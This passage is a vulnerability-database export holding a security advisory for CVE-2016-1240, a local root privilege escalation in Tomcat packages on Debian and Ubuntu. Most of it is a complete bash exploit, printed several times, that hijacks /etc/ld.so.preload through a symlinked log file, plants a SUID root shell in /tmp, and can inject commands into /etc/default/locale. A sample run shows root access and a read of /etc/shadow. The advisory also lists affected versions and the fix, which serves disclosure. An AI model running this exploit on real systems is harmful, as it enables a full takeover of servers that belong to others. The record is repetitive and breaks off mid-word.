\r\n\r\nThe script for tomcat7 contains the following lines:\r\n```\r\n-----[tomcat7]----\r\n\r\n# Run the catalina.sh script as a daemon\r\nset +e\r\ntouch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\nchown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\n\r\n-------[eof]------\r\n```\r\nLocal attackers who have gained access to the server in the context of the\r\ntomcat user (for example, through a vulnerability in a web application) would \r\nbe able to replace the log file with a symlink to an arbitrary system file \r\nand escalate their privileges to root once the Tomcat init script (running as root)\r\nre-opens the catalina.out file after a service restart, reboot etc.\r\n\r\nAs attackers would already have a tomcat account at the time of exploitation,\r\nthey could also kill the tomcat processes to introduce the need for a restart.\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n```\r\n------[ tomcat-rootprivesc-deb.sh ]------\r\n\r\n#!/bin/bash\r\n#\r\n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\n#\r\n# CVE-2016-1240\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# http://legalhackers.com\r\n#\r\n# This exploit targets Tomcat (versions 6, 7 and 8) packaging on \r\n# Debian-based distros including Debian, Ubuntu etc.\r\n# It allows attackers with a tomcat shell (e.g. obtained remotely through a \r\n# vulnerable java webapp, or locally via weak permissions on webapps in the \r\n# Tomcat webroot directories etc.) to escalate their privileges to root.\r\n#\r\n# Usage:\r\n# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]\r\n#\r\n# The exploit can be used in two ways:\r\n#\r\n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly\r\n# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 
\r\n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up\r\n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)\r\n#\r\n# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to \r\n# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. \r\n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \r\n# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can\r\n# then add arbitrary commands to the file which will be executed with root privileges by \r\n# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default \r\n# Ubuntu/Debian Tomcat installations).\r\n#\r\n# See full advisory for details at:\r\n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/tomcatrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $TOMCATLOG\r\n\ttouch $TOMCATLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload 2>/dev/null\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. 
Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2016-1240\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina.out [-deferred]\\n\"\r\n\texit 3\r\nfi\r\nif [ \"$2\" = \"-deferred\" ]; then\r\n\tmode=\"deferred\"\r\nelse\r\n\tmode=\"active\"\r\nfi\r\n\r\n# Priv check\r\necho -e \"\\n[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \\n`id`\"\r\nid | grep -q tomcat\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as tomcat user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nTOMCATLOG=\"$1\"\r\nif [ ! -f $TOMCATLOG ]; then\r\n\techo -e \"\\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target Tomcat log file set to $TOMCATLOG\"\r\n\r\n# [ Deferred exploitation ]\r\n\r\n# Symlink the log file to /etc/default/locale file which gets executed daily on default\r\n# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.\r\n# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been\r\n# restarted and file owner gets changed.\r\nif [ \"$mode\" = \"deferred\" ]; then\r\n\trm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG\r\n\tif [ $? -ne 0 ]; then\r\n\t\techo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\t\tcleanexit 3\r\n\tfi\r\n\techo -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\techo -e \"\\n[+] The current owner of the file is: \\n`ls -l /etc/default/locale`\"\r\n\techo -ne \"\\n[+] Keep an eye on the owner change on /etc/default/locale . 
After the Tomcat restart / system reboot\"\r\n\techo -ne \"\\n you'll be able to add arbitrary commands to the file which will get executed with root privileges\"\r\n\techo -ne \"\\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\\n\\n\"\r\n\texit 0\r\nfi\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\tunlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Symlink the log file to ld.so.preload\r\nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] 
Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\r\n# Wait for Tomcat to re-open the logs\r\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\r\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/ld.so.preload file should be owned by tomcat user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo --help 2>/dev/null >/dev/null\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Executing the rootshell $BACKDOORPATH now! 
\\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\r\n\r\n--------------[ EOF ]--------------------\r\n```\r\n\r\n\r\nExample exploit run:\r\n~~~~~~~~~~~~~~\r\n```\r\ntomcat7@ubuntu:/tmp$ id\r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\ntomcat7@ubuntu:/tmp$ lsb_release -a\r\nNo LSB modules are available.\r\nDistributor ID:\tUbuntu\r\nDescription:\tUbuntu 16.04 LTS\r\nRelease:\t16.04\r\nCodename:\txenial\r\n\r\ntomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat\r\nii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries\r\nii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine\r\nii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files\r\n\r\ntomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out \r\n \r\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\nCVE-2016-1240\r\n\r\nDiscovered and coded by: \r\n\r\nDawid Golunski \r\nhttp://legalhackers.com \r\n\r\n[+] Starting the exploit in [active] mode with the following privileges: \r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\n[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out\r\n\r\n[+] Compiling the privesc shared library (/tmp/privesclib.c)\r\n\r\n[+] Backdoor/low-priv shell installed at: \r\n-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\n[+] Symlink created at: \r\nlrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload\r\n\r\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\r\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\r\n\r\n[+] Tomcat restarted. 
The /etc/ld.so.preload file got created with tomcat privileges: \r\n-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload\r\n\r\n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r\n\r\n[+] The /etc/ld.so.preload file now contains: \r\n/tmp/privesclib.so\r\n\r\n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r\n\r\n[+] Rootshell got assigned root SUID perms at: \r\n-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\nPlease tell me you're seeing this too ;) \r\n\r\n[+] Executing the rootshell /tmp/tomcatrootsh now! \r\n\r\ntomcatrootsh-4.3# id\r\nuid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)\r\ntomcatrootsh-4.3# whoami\r\nroot\r\ntomcatrootsh-4.3# head -n3 /etc/shadow\r\nroot:$6$oaf[cut]:16912:0:99999:7:::\r\ndaemon:*:16912:0:99999:7:::\r\nbin:*:16912:0:99999:7:::\r\ntomcatrootsh-4.3# exit\r\nexit\r\n\r\n[+] Cleaning up...\r\n\r\n[+] Job done. Exiting with code 0 \r\n\r\n```\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nLocal attackers who have gained access to the tomcat user account (for example \r\nremotely via a vulnerable web application, or locally via weak webroot perms),\r\ncould escalate their privileges to root and fully compromise the affected system.\r\n\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nThe following Debian package versions are affected:\r\n\r\nTomcat 8 <= 8.0.36-2\r\nTomcat 7 <= 7.0.70-2\r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nA more detailed list of affected packages can be found at:\r\n\r\nDebian:\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\nUbuntu:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nOther systems that use Tomcat packages provided by Debian may also be affected.\r\n\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nDebian Security Team was contacted and has fixed affected upstream packages.\r\nUpdate to the latest tomcat packages provided by your distribution.\r\n \r\nIX. 
REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nhttp://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n\r\nThe exploit's sourcecode\r\nhttp://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh\r\n\r\nCVE-2016-1240\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240\r\n\r\nUbuntu Security Notice USN-3081-1:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nDebian Security Advisory DSA-3669-1 (tomcat7):\r\nhttps://lists.debian.org/debian-security-announce/2016/msg00249.html\r\nhttps://www.debian.org/security/2016/dsa-3669\r\n\r\nDebian Security Advisory DSA-3670-1 (tomcat8):\r\nhttps://www.debian.org/security/2016/dsa-3670\r\n\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nhttp://legalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n30.09.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. 
I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.", "modified": "2016-10-04T00:00:00", "published": "2016-10-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92455", "id": "SSV:92455", "type": "seebug", "title": "Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation", "sourceData": "\n #!/bin/bash\r\n#\r\n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\n#\r\n# CVE-2016-1240\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# http://legalhackers.com\r\n#\r\n# This exploit targets Tomcat (versions 6, 7 and 8) packaging on \r\n# Debian-based distros including Debian, Ubuntu etc.\r\n# It allows attackers with a tomcat shell (e.g. obtained remotely through a \r\n# vulnerable java webapp, or locally via weak permissions on webapps in the \r\n# Tomcat webroot directories etc.) to escalate their privileges to root.\r\n#\r\n# Usage:\r\n# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]\r\n#\r\n# The exploit can be used in two ways:\r\n#\r\n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly\r\n# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. \r\n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up\r\n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)\r\n#\r\n# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to \r\n# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. \r\n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \r\n# Tomcat restart / server reboot, the file should be owned by tomcat user. 
The attackers can\r\n# then add arbitrary commands to the file which will be executed with root privileges by \r\n# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default \r\n# Ubuntu/Debian Tomcat installations).\r\n#\r\n# See full advisory for details at:\r\n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/tomcatrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $TOMCATLOG\r\n\ttouch $TOMCATLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload 2>/dev/null\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2016-1240\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina.out [-deferred]\\n\"\r\n\texit 3\r\nfi\r\nif [ \"$2\" = \"-deferred\" ]; then\r\n\tmode=\"deferred\"\r\nelse\r\n\tmode=\"active\"\r\nfi\r\n\r\n# Priv check\r\necho -e \"\\n[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \\n`id`\"\r\nid | grep -q tomcat\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as tomcat user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nTOMCATLOG=\"$1\"\r\nif [ ! 
-f $TOMCATLOG ]; then\r\n\techo -e \"\\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target Tomcat log file set to $TOMCATLOG\"\r\n\r\n# [ Deferred exploitation ]\r\n\r\n# Symlink the log file to /etc/default/locale file which gets executed daily on default\r\n# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.\r\n# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been\r\n# restarted and file owner gets changed.\r\nif [ \"$mode\" = \"deferred\" ]; then\r\n\trm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG\r\n\tif [ $? -ne 0 ]; then\r\n\t\techo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\t\tcleanexit 3\r\n\tfi\r\n\techo -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\techo -e \"\\n[+] The current owner of the file is: \\n`ls -l /etc/default/locale`\"\r\n\techo -ne \"\\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot\"\r\n\techo -ne \"\\n you'll be able to add arbitrary commands to the file which will get executed with root privileges\"\r\n\techo -ne \"\\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. 
See also -active mode if you can't wait ;)\\n\\n\"\r\n\texit 0\r\nfi\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\tunlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Symlink the log file to ld.so.preload\r\nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] 
Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\r\n# Wait for Tomcat to re-open the logs\r\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\r\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/ld.so.preload file should be owned by tomcat user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo --help 2>/dev/null >/dev/null\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Executing the rootshell $BACKDOORPATH now! 
\\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92455"}], "exploitdb": [{"lastseen": "2016-10-04T09:29:12", "bulletinFamily": "exploit", "description": "Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation. CVE-2016-1240. Local exploit for Linux platform", "modified": "2016-10-03T00:00:00", "published": "2016-10-03T00:00:00", "id": "EDB-ID:40450", "href": "https://www.exploit-db.com/exploits/40450/", "type": "exploitdb", "title": "Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation", "sourceData": "=============================================\r\n- Discovered by: Dawid Golunski\r\n- http://legalhackers.com\r\n- dawid (at) legalhackers.com\r\n\r\n- CVE-2016-1240\r\n- Release date: 30.09.2016\r\n- Revision: 1\r\n- Severity: High\r\n=============================================\r\n\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\n\r\nApache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation\r\n\r\nAffected debian packages:\r\n\r\nTomcat 8 <= 8.0.36-2 \r\nTomcat 7 <= 7.0.70-2 \r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nUbuntu systems are also affected. See section VII. for details.\r\nOther systems using the affected debian packages may also be affected.\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"The Apache Tomcat\u00ae software is an open source implementation of the \r\nJava Servlet, JavaServer Pages, Java Expression Language and Java WebSocket \r\ntechnologies. 
The Java Servlet, JavaServer Pages, Java Expression Language \r\nand Java WebSocket specifications are developed under the Java Community \r\nProcess.\r\n\r\nThe Apache Tomcat software is developed in an open and participatory \r\nenvironment and released under the Apache License version 2. \r\nThe Apache Tomcat project is intended to be a collaboration of the \r\nbest-of-breed developers from around the world.\r\n\r\nApache Tomcat software powers numerous large-scale, mission-critical web \r\napplications across a diverse range of industries and organizations. \r\nSome of these users and their stories are listed on the PoweredBy wiki page.\r\n\"\r\n\r\nhttp://tomcat.apache.org/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nTomcat (6, 7, 8) packages provided by default repositories on Debian-based \r\ndistributions (including Debian, Ubuntu etc.) provide a vulnerable\r\ntomcat init script that allows local attackers who have already gained access \r\nto the tomcat account (for example, by exploiting an RCE vulnerability\r\nin a java web application hosted on Tomcat, uploading a webshell etc.) to\r\nescalate their privileges from tomcat user to root and fully compromise the \r\ntarget system.\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\nThe vulnerability is located in the tomcat init script provided by affected\r\npackages, normally installed at /etc/init.d/tomcatN. 
\r\n\r\nThe script for tomcat7 contains the following lines:\r\n\r\n-----[tomcat7]----\r\n\r\n# Run the catalina.sh script as a daemon\r\nset +e\r\ntouch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\nchown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\n\r\n-------[eof]------\r\n\r\nLocal attackers who have gained access to the server in the context of the\r\ntomcat user (for example, through a vulnerability in a web application) would \r\nbe able to replace the log file with a symlink to an arbitrary system file \r\nand escalate their privileges to root once the Tomcat init script (running as root)\r\nre-opens the catalina.out file after a service restart, reboot etc.\r\n\r\nAs attackers would already have a tomcat account at the time of exploitation,\r\nthey could also kill the tomcat processes to introduce the need for a restart.\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n\r\n------[ tomcat-rootprivesc-deb.sh ]------\r\n\r\n#!/bin/bash\r\n#\r\n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\n#\r\n# CVE-2016-1240\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# http://legalhackers.com\r\n#\r\n# This exploit targets Tomcat (versions 6, 7 and 8) packaging on \r\n# Debian-based distros including Debian, Ubuntu etc.\r\n# It allows attackers with a tomcat shell (e.g. obtained remotely through a \r\n# vulnerable java webapp, or locally via weak permissions on webapps in the \r\n# Tomcat webroot directories etc.) to escalate their privileges to root.\r\n#\r\n# Usage:\r\n# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]\r\n#\r\n# The exploit can be used in two ways:\r\n#\r\n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly\r\n# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 
\r\n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up\r\n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)\r\n#\r\n# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to \r\n# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. \r\n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \r\n# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can\r\n# then add arbitrary commands to the file which will be executed with root privileges by \r\n# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default \r\n# Ubuntu/Debian Tomcat installations).\r\n#\r\n# See full advisory for details at:\r\n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no 